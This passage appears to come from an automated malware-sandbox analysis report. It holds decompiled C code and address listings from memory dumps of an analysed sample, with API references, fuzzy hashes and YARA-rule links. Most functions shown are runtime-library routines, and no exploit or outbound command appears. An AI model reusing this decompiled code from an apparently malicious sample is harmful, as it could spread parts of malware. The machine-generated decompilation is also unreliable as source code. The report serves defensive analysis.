									_t90 = 0x6d8e4180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d8e4178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d8e4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d8e4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6d8e23cf
0x6d8e23d2
0x6d8e23d8
0x6d8e23f6
0x00000000
0x6d8e23f6
0x6d8e23e0
0x6d8e23e9
0x6d8e23ef
0x6d8e23fe
0x6d8e2401
0x6d8e2404
0x6d8e240e
0x6d8e240e
0x6d8e2410
0x6d8e2413
0x6d8e2415
0x6d8e2415
0x6d8e2417
0x6d8e241a
0x00000000
0x00000000
0x6d8e241c
0x6d8e241e
0x6d8e2484
0x6d8e2484
0x6d8e25e2
0x00000000
0x6d8e25e2
0x6d8e2420
0x6d8e2420
0x6d8e2424
0x6d8e2426
0x6d8e2426
0x6d8e2426
0x6d8e2426
0x6d8e2429
0x6d8e242a
0x6d8e242d
0x6d8e242d
0x6d8e2431
0x6d8e2435
0x6d8e2443
0x6d8e2443
0x6d8e244b
0x6d8e2451
0x6d8e2453
0x6d8e2455
0x6d8e2465
0x6d8e2472
0x6d8e2476
0x6d8e247b
0x6d8e247d
0x6d8e24fb
0x6d8e24fb
0x6d8e247f
0x6d8e247f
0x6d8e247f
0x6d8e24fd
0x6d8e24ff
0x6d8e25e0
0x6d8e25e0
0x00000000
0x6d8e2505
0x6d8e2505
0x6d8e250c
0x00000000
0x00000000
0x6d8e2512
0x6d8e2516
0x6d8e2572
0x6d8e2574
0x6d8e257c
0x6d8e257e
0x6d8e2580
0x00000000
0x00000000
0x6d8e2582
0x6d8e2588
0x6d8e258a
0x6d8e258c
0x6d8e25a1
0x6d8e25a1
0x6d8e25a3
0x6d8e25d2
0x6d8e25d9
0x00000000
0x6d8e25d9
0x6d8e25a7
0x6d8e25a8
0x6d8e25aa
0x6d8e25ac
0x6d8e25ac
0x6d8e25ae
0x6d8e25b0
0x6d8e25b2
0x6d8e25c6
0x6d8e25c6
0x6d8e25c9
0x6d8e25cb
0x6d8e25cb
0x6d8e25cc
0x6d8e25cc
0x00000000
0x6d8e25b4
0x6d8e25b4
0x6d8e25b4
0x6d8e25bd
0x6d8e25be
0x6d8e25c0
0x6d8e25c2
0x6d8e25c2
0x00000000
0x6d8e25b4
0x6d8e25b2
0x6d8e258e
0x6d8e2595
0x6d8e2595
0x6d8e2597
0x00000000
0x00000000
0x6d8e2599
0x6d8e259a
0x6d8e259d
0x6d8e259f
0x00000000
0x00000000
0x00000000
0x6d8e259f
0x00000000
0x6d8e2595
0x6d8e2518
0x6d8e251b
0x6d8e2520
0x00000000
0x00000000
0x6d8e2529
0x6d8e252b
0x6d8e2531
0x00000000
0x00000000
0x6d8e2537
0x6d8e253d
0x00000000
0x00000000
0x6d8e2543
0x6d8e2545
0x6d8e254e
0x6d8e2552
0x00000000
0x00000000
0x6d8e2558
0x6d8e255b
0x6d8e255d
0x00000000
0x00000000
0x6d8e2564
0x6d8e2566
0x00000000
0x00000000
0x6d8e2568
0x6d8e256c
0x00000000
0x00000000
0x00000000
0x6d8e256c
0x00000000
0x00000000
0x00000000
0x6d8e2457
0x6d8e2457
0x6d8e2457
0x6d8e245e
0x00000000
0x00000000
0x6d8e2460
0x6d8e2461
0x6d8e2463
0x00000000
0x00000000
0x00000000
0x6d8e2463
0x6d8e248b
0x6d8e248d
0x00000000
0x00000000
0x6d8e249d
0x6d8e249f
0x6d8e24a1
0x00000000
0x00000000
0x6d8e24a7
0x6d8e24ae
0x6d8e24da
0x6d8e24da
0x6d8e24dc
0x6d8e24de
0x6d8e24f2
0x6d8e24f4
0x00000000
0x00000000
0x00000000
0x00000000
0x6d8e24e0
0x6d8e24e0
0x6d8e24e0
0x6d8e24e9
0x6d8e24ea
0x6d8e24ec
0x6d8e24ee
0x6d8e24ee
0x00000000
0x6d8e24e0
0x6d8e24b0
0x6d8e24b3
0x6d8e24b5
0x6d8e24c7
0x6d8e24c7
0x6d8e24ca
0x6d8e24cc
0x6d8e24cc
0x6d8e24cd
0x6d8e24cd
0x6d8e24d3
0x00000000
0x00000000
0x00000000
0x00000000
0x6d8e24b7
0x6d8e24b7
0x6d8e24b7
0x6d8e24be
0x00000000
0x00000000
0x6d8e24c0
0x6d8e24c0
0x6d8e24c1
0x00000000
0x00000000
0x00000000
0x6d8e24c1
0x6d8e24c3
0x6d8e24c5
0x6d8e24d8
0x00000000
0x00000000
0x00000000
0x6d8e24d8
0x00000000
0x6d8e24c5
0x6d8e2437
0x6d8e243a
0x6d8e243d
0x00000000
0x00000000
0x6d8e243f
0x6d8e2441
0x00000000
0x00000000
0x00000000
0x6d8e2441
0x6d8e2406
0x6d8e2408
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D8E2476

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 01604c0bce61b606aee6aa9fb455b83827f7947def4f5673727c54e7d316ebc4
Instruction ID: da6bb60f43fff3d6080da88d08dfe627cf85dece19d7b4ba31145edaf489884d
Opcode Fuzzy Hash: 01604c0bce61b606aee6aa9fb455b83827f7947def4f5673727c54e7d316ebc4
Instruction Fuzzy Hash: A461B8316146179BDB39CE2CC99CB6937B5BB8B3DCB248E69E816C7150E738D841CE90

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E21A4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6D8E21A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6D8E230B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6D8E23C5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6D8E22B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6D8E230B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6D8E23A7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6d8e21a8
0x6d8e21a9
0x6d8e21aa
0x6d8e21ad
0x6d8e21af
0x6d8e21b2
0x6d8e21b3
0x6d8e21b5
0x6d8e21b6
0x6d8e21b7
0x6d8e21ba
0x6d8e21c4
0x6d8e2275
0x6d8e227c
0x6d8e2285
0x6d8e21ca
0x6d8e21ca
0x6d8e21d0
0x6d8e21d6
0x6d8e21d9
0x6d8e21dc
0x6d8e21e0
0x6d8e21e5
0x6d8e21ea
0x6d8e226a
0x00000000
0x6d8e21ec
0x6d8e21ec
0x6d8e21f8
0x6d8e21fa
0x6d8e2255
0x6d8e2255
0x6d8e225b
0x00000000
0x6d8e21fc
0x6d8e220b
0x6d8e220d
0x6d8e220e
0x6d8e220f
0x6d8e2212
0x6d8e2212
0x6d8e2214
0x00000000
0x6d8e2216
0x6d8e2216
0x6d8e2260
0x6d8e2218
0x6d8e2218
0x6d8e221c
0x6d8e2224
0x6d8e2229
0x6d8e222e
0x6d8e223a
0x6d8e2242
0x6d8e2249
0x6d8e224f
0x6d8e2253
0x00000000
0x6d8e2253
0x6d8e2216
0x6d8e2214
0x00000000
0x6d8e21fa
0x6d8e226e
0x6d8e226e
0x6d8e226e
0x6d8e21ea
0x6d8e228a
0x6d8e2291

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: d0f1c1280baea99642e77669b610f75be407a8c072fba959d136b31574eba575
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 3E21A9725042069BC710DF68CCC4A67F7A9FF4A390B468558ED159B145D734F615CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D95213B, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638237289.000000006D952000.00000040.00020000.sdmp, Offset: 6D952000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 1d8faf50cdfb6e8018de5cc194e5349421656eaab35f743f935bd444a52c430d
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: CA1181733406019FD724CF59DCC0EA773AAFB99270B298166EE04CB305D636E852C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D952534, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638237289.000000006D952000.00000040.00020000.sdmp, Offset: 6D952000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: eab2d96b8ff3108f2d4da006b7265ac3da3dbf1e5f727f249ca61c234544a5b9
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: D801F5333542018FD72ACB6CD9A4D79B7E8EBC5328B15C07EC54787615D130E842CA20

Uniqueness

Uniqueness Score: -1.00%

Function 6D9211D0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 843070b87ccbf2b28586080f9e287353ae3e7ef224a8b753cdf004862bea0f0b
Instruction ID: 2e44e45e96c9a812be13b38a207a02da55d4839008a2f3ab687b69ecab1174ff
Opcode Fuzzy Hash: 843070b87ccbf2b28586080f9e287353ae3e7ef224a8b753cdf004862bea0f0b
Instruction Fuzzy Hash: 6E117074D14248ABDB01DF94C841BAEB3B5AB45308F204554E515BB286D736FB50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D914880, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbcdc5748d0a24a4ab8d7cb436455904cf1c3148fa69c05c0d80ad57b9c2d07
Instruction ID: 22bb5429e328795c5f39a48108571e3006009419133e303bd87cd76b29b13dab
Opcode Fuzzy Hash: bcbcdc5748d0a24a4ab8d7cb436455904cf1c3148fa69c05c0d80ad57b9c2d07
Instruction Fuzzy Hash: 95E0E530CAC2CCA6CB0386648851BF97BBC6F4F308F0445C4C45017242C0BBC54ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D921310, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e428617fbe6e130635a3559bcb4522fa1a13af3dd56393e55eee6614412ee0ee
Instruction ID: 4bd311de2747e7332d1dfb11ce02b6df70d5c5e13a15fb592fe79cfab8d8e967
Opcode Fuzzy Hash: e428617fbe6e130635a3559bcb4522fa1a13af3dd56393e55eee6614412ee0ee
Instruction Fuzzy Hash: F4E0DFBAD14648EBCB04CF40E841A5AB379EB88214F204298E9095B704E636FF20C6C1

Uniqueness

Uniqueness Score: -1.00%

Function 6D915680, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175timeCOMMON

Download Yara Rule

APIs

__crt_fast_decode_pointer.LIBVCRUNTIMED ref: 6D9156A7
__crt_fast_decode_pointer.LIBVCRUNTIMED ref: 6D9156BD
__crt_fast_decode_pointer.LIBVCRUNTIMED ref: 6D9156D3
std::_Timevec::_Timevec.LIBCPMTD ref: 6D915754
std::_Timevec::_Timevec.LIBCPMTD ref: 6D91579D

Strings

, xrefs: 6D91571F

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: __crt_fast_decode_pointer$TimevecTimevec::_std::_
String ID:
API String ID: 2527748162-3916222277
Opcode ID: a7babf4cb39fe6d1dac74880d6c2aa1bf72a5ce8ed5e8358ba1363bc4e54f0ef
Instruction ID: 0096c0574e08107b8094eef961dd3811ad7a5a619baef33b9cd71a721b5601f6
Opcode Fuzzy Hash: a7babf4cb39fe6d1dac74880d6c2aa1bf72a5ce8ed5e8358ba1363bc4e54f0ef
Instruction Fuzzy Hash: D47118B4E08209DFCF04CFA4D891AAEBBB2BF59308F218159D615BB351D731AA41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D9267C0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6D92689D

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: 1999b4e237fd62d22509dac862b3a387bfa611b7d20e583adbe9dd7731aa833f
Instruction ID: d7fe5a141de6e99adf26181a3df7184066c5c1a2880f1ee06217493ac8a5e237
Opcode Fuzzy Hash: 1999b4e237fd62d22509dac862b3a387bfa611b7d20e583adbe9dd7731aa833f
Instruction Fuzzy Hash: 1741D7B5E5420C7BEB14EAA4DC52F7D36685BE4308F11C554FA44BB2C7EA31EA1087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D916350, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6D916A62,?,?,?,?,?,?,?,6D925DE4,00000002,?,00000000), ref: 6D916390

Strings

@, xrefs: 6D9164FF
@, xrefs: 6D91645C

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: HandleModule
String ID: @$@
API String ID: 4139908857-149943524
Opcode ID: ac48cfd94a0320469c815bfee1436033ab0f4884467068af381c3174795a6e97
Instruction ID: c0fe125452129cfb9363f07398419b56e05e1235f7ba98bfdb1f4de00fe788ff
Opcode Fuzzy Hash: ac48cfd94a0320469c815bfee1436033ab0f4884467068af381c3174795a6e97
Instruction Fuzzy Hash: 28D18CB0D4822DEBDB25DF94CC49BAAB774BB55304F0081E9E508AB281D774DAC5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6D92D070, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__aligned_msize.LIBCMTD ref: 6D92D14F
__aligned_msize.LIBCMTD ref: 6D92D1D2

Strings

, xrefs: 6D92D0B3

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: __aligned_msize
String ID:
API String ID: 2742001778-3916222277
Opcode ID: 7b2ec6a53dcabc2f1b1b1faea9ce8b9a92b611a3404402c3da53b80dbb63ff58
Instruction ID: 545aab0c1825c40409e59b7686f48f214831298324c311a214048431c88be6c8
Opcode Fuzzy Hash: 7b2ec6a53dcabc2f1b1b1faea9ce8b9a92b611a3404402c3da53b80dbb63ff58
Instruction Fuzzy Hash: 56715CB091820DAFCB04DFA4DC41BAEBBB5AFA8318F11C198E51867386D735DA15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D9313A0, Relevance: 10.7, APIs: 7, Instructions: 158COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6D9322A3
__sptype.LIBCMTD ref: 6D9322C9
__except1.LIBCMTD ref: 6D93231B

Part of subcall function 6D931CD0: RtlDecodePointer.NTDLL(6D9661C4), ref: 6D931CE7

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: DecodePointer__ctrlfp__except1__sptype
String ID:
API String ID: 3005914202-0
Opcode ID: e5759e9936eacec7bb549c86f22ad4513476faeda30f56912945385b705e13de
Instruction ID: 5636122b7ac2e272736457696de85663077caefb5a86279a6f2fa2ce617160b0
Opcode Fuzzy Hash: e5759e9936eacec7bb549c86f22ad4513476faeda30f56912945385b705e13de
Instruction Fuzzy Hash: F1513671C1C609E6CF11BF68E94926DBB74FF96705F12C6A8E9C865185EB30C668C383

Uniqueness

Uniqueness Score: -1.00%

Function 6D926A30, Relevance: 10.6, APIs: 7, Instructions: 141timememoryCOMMON

Download Yara Rule

APIs

__MarkAllocaS.LIBCMTD ref: 6D926AF2

Part of subcall function 6D924090: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6D9240C3

std::_Timevec::_Timevec.LIBCPMTD ref: 6D926B0D
std::_Timevec::_Timevec.LIBCPMTD ref: 6D926B18
std::_Mutex::_Lock.LIBCPMTD ref: 6D926B33
std::_Mutex::_Lock.LIBCPMTD ref: 6D926B97
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 6D926BBE
std::_Mutex::_Lock.LIBCPMTD ref: 6D926BCA

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide
String ID:
API String ID: 4088819714-0
Opcode ID: d0cd2ed3bc81d342c68516fd915bc85f1c223286f6099b30ded393b4b4ab21d5
Instruction ID: 2a15d8ebe3e5c3c83490d9f0d265a55e24a47cb3ee85cd05585cf6fcf60acb8e
Opcode Fuzzy Hash: d0cd2ed3bc81d342c68516fd915bc85f1c223286f6099b30ded393b4b4ab21d5
Instruction Fuzzy Hash: 99512CB1D2810DEBDB04DFA4DC91BEEB779AF58308F008158E601A7690EB34EA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D908960, Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

___vcrt_FlsFree.LIBVCRUNTIMED ref: 6D90898B

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: Free___vcrt_
String ID:
API String ID: 1062205359-0
Opcode ID: 442408db52e21c713b75ef3176c4b473c91105727c814e6042f86f974782b295
Instruction ID: 62d536a97cc5335407eccf50173eae24b3128e465c2630e8fe4b1c6545c3474a
Opcode Fuzzy Hash: 442408db52e21c713b75ef3176c4b473c91105727c814e6042f86f974782b295
Instruction Fuzzy Hash: 76315275E08509DBCB0CFBA5E845BEE7779AB20308F41426CD615772D2EB34DA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D908F5A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6D9072A0: ___vcrt_getptd.LIBVCRUNTIMED ref: 6D9072A4
Part of subcall function 6D9072A0: ___vcrt_getptd.LIBVCRUNTIMED ref: 6D9072B1

___vcrt_getptd.LIBVCRUNTIMED ref: 6D908F77
___vcrt_getptd.LIBVCRUNTIMED ref: 6D908F82
__IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 6D908FD8
___DestructExceptionObject.LIBVCRUNTIMED ref: 6D908FFD

Strings

csm, xrefs: 6D908F90

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
String ID: csm
API String ID: 485384042-1018135373
Opcode ID: 328dee232441d6aa24c8251ff1198257f0a7a6968a33ed8709daf1f0ff7481b2
Instruction ID: 295d12fd7c6744c148edf73be736f61f38039b67cf24bcebc8dc8704b3c1b32b
Opcode Fuzzy Hash: 328dee232441d6aa24c8251ff1198257f0a7a6968a33ed8709daf1f0ff7481b2
Instruction Fuzzy Hash: 53217C78A04205EFCB09DF65E440AAE7B7ABF98309F55805CE9190F242C731DA82CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 6D8FE690, Relevance: 7.8, APIs: 5, Instructions: 331COMMON

Download Yara Rule

APIs

__nh_malloc.LIBCMTD ref: 6D8FE7AC
__nh_malloc.LIBCMTD ref: 6D8FE859
__nh_malloc.LIBCMTD ref: 6D8FE930
__nh_malloc.LIBCMTD ref: 6D8FE9A5
__nh_malloc.LIBCMTD ref: 6D8FEAC7

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: __nh_malloc
String ID:
API String ID: 2620867233-0
Opcode ID: 089585ae4e10dd6dbd88cc5a8ebc35b12bef198d5fa5ecdfa1fda6b1db7f5a76
Instruction ID: 27268d0514f2dd651aaf53eab1190bd762d7d076f6a68012ded92f30927172d7
Opcode Fuzzy Hash: 089585ae4e10dd6dbd88cc5a8ebc35b12bef198d5fa5ecdfa1fda6b1db7f5a76
Instruction Fuzzy Hash: 24E1E3B1904B458FDB11CF28C4807AABBF1FF99344F118A1DD999DB252EB34E586CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D91E420, Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 265COMMON

Download Yara Rule

Strings

", xrefs: 6D91E642
*, xrefs: 6D91E5B0
*, xrefs: 6D91E79D
", xrefs: 6D91E77E

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID: "$"$*$*
API String ID: 0-3534430112
Opcode ID: 1a7200b8a723ff340b22cc7391205865dd32c7de6570a8b66a030299004cf173
Instruction ID: 6241c9eb1b7564f58e43f1f231959f03a85d34d5873d3fb422cd13041c78fc93
Opcode Fuzzy Hash: 1a7200b8a723ff340b22cc7391205865dd32c7de6570a8b66a030299004cf173
Instruction Fuzzy Hash: BEB15870D0820DEBEB05CF90DC84BEE77B5BF55318F108128E615AB692D7B4DA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D91C9B0, Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

__crt_fast_decode_pointer.LIBVCRUNTIMED ref: 6D91C9CC

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: __crt_fast_decode_pointer
String ID:
API String ID: 2589944070-0
Opcode ID: c4aac0b64528ced762d7910270afb0849b586974692a6b2f24d0140cd7e9baab
Instruction ID: fba0d7250fc08ec802cac2050b36c8695f8ad041d0334ad178f281029c004645
Opcode Fuzzy Hash: c4aac0b64528ced762d7910270afb0849b586974692a6b2f24d0140cd7e9baab
Instruction Fuzzy Hash: 823194B4D4C20DF7DF12DAA4EC45B7EB778AB64308F118428EA05A7242E731E658CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D91CC40, Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6D91CB39,00000000,00000800,?,?,6D91CB39,00000000), ref: 6D91CC51
GetLastError.KERNEL32(?,?,6D91CB39), ref: 6D91CC65
_wcsncmp.LIBCMTD ref: 6D91CC7B
_wcsncmp.LIBCMTD ref: 6D91CC92
LoadLibraryExW.KERNEL32(6D91CB39,00000000,00000000,?,?,?,?,6D91CB39), ref: 6D91CCA6

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: LibraryLoad_wcsncmp$ErrorLast
String ID:
API String ID: 180994465-0
Opcode ID: d14c06f6fe313e1d12ccf889107aca8901fa38437356cb0f547256bf5b9cc048
Instruction ID: f5b873a2aa9f66d73fdd601723f707811d794cae885a9eb1f8678f69d839cb1b
Opcode Fuzzy Hash: d14c06f6fe313e1d12ccf889107aca8901fa38437356cb0f547256bf5b9cc048
Instruction Fuzzy Hash: 2301A97465820CBBDB119BA1CE4AF6977B99B85740F128864FA089B181D770DE00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D921750, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 221timeCOMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMTD ref: 6D9217E5
std::_Timevec::_Timevec.LIBCPMTD ref: 6D921903

Part of subcall function 6D921ED0: __wcstombs_l.LIBCMTD ref: 6D921EED

Strings

*, xrefs: 6D921807
?, xrefs: 6D92180B

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: TimevecTimevec::___wcstombs_lstd::_std::exception::exception
String ID: *$?
API String ID: 393888142-2367018687
Opcode ID: 1ed7b8a32c8a4a6d0611a7421c5fc9e1a03ff88027217348083a9d369c6490df
Instruction ID: 8cf62719d0052cc86e70abaec72ae5ccc1905e55dd6c88c5d286db06ed8f8d2f
Opcode Fuzzy Hash: 1ed7b8a32c8a4a6d0611a7421c5fc9e1a03ff88027217348083a9d369c6490df
Instruction Fuzzy Hash: F3915CB0D2420DAFDB05DFD4D880BEEB7B5BF5A308F108129D5157B289EB71AA14CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D921480, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e3048e69cf1b768c4a2263461521f870cec9990d790f624ae5e96c978f0e66
Instruction ID: 620bdca377169386f0d42010f70a4bd78dbbbb31d8a6390ebf0cefcfe67cd5cc
Opcode Fuzzy Hash: 33e3048e69cf1b768c4a2263461521f870cec9990d790f624ae5e96c978f0e66
